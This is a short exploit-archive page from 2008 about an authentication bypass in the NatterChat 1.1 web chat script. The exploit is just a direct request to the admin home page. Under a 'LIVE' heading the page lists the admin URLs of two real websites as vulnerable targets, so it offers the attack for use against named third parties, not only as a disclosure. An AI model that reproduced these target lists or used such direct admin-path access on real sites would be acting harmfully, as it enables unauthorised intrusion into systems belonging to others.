[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NatterChat 1.1 Remote Admin Bypass Vulnerability
# Published : 2008-11-20
# Author : Stack
# Previous Title : ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability
# Next Title : VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability
==============================================================================
NATTERCHAT v1.1 Admin Home Bypass Vulnerability
==============================================================================
[??] Script : [ NATTERCHAT v1.1 ]
[??] Discover: [ Mountassif Moad ]
===[ XPL ]===
[??] http://localhost/[path]/admin/home.php
===[ LIVE ]===
[??] http://www.welfarerights.net/natterchat/admin/home.asp
[??] http://www.natterchat.co.uk/version11/admin/home.asp
# www.Syue.com [2008-11-20]